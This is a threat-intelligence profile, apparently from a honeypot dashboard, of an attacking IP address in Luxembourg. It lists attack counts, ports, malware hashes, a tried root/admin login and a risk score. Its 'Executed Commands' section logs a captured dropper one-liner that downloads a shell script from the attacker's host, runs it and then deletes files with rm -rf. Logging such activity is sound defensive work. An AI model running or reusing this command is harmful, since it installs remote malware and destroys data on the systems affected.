TROYANOSYVIRUS
Active ThreatMEDIUM

176.65.139.177

Country of Origin🇱🇺 LU
First Detection4/25/2026
Last Activity4/29/2026
ISPOffshore LC
🎯
42
Total Attacks
🔌
5
Ports
📡
4
Attack Types
🦠
2
Malware

Geolocation

Country
🇱🇺 LU
City
Unknown
ASN
AS214472
ISP
Offshore LC

Attack Types

ssh_telnet_honeypot
malware_capture
web_honeypot
tcp_trap

Attacked Ports

22808160008088

Associated Malware

4cd465ecc8e602257910...b67c0b14ea76cb5d5e4c...

Attempted Credentials

🔐root/admin
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.65.139.177/cat.sh; curl -O http://176.65.139.177/cat.sh; chmod 777 cat.sh; sh cat.sh; rm -rf cat.sh; rm -rf *1x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

52
/100
LowMediumHighCritical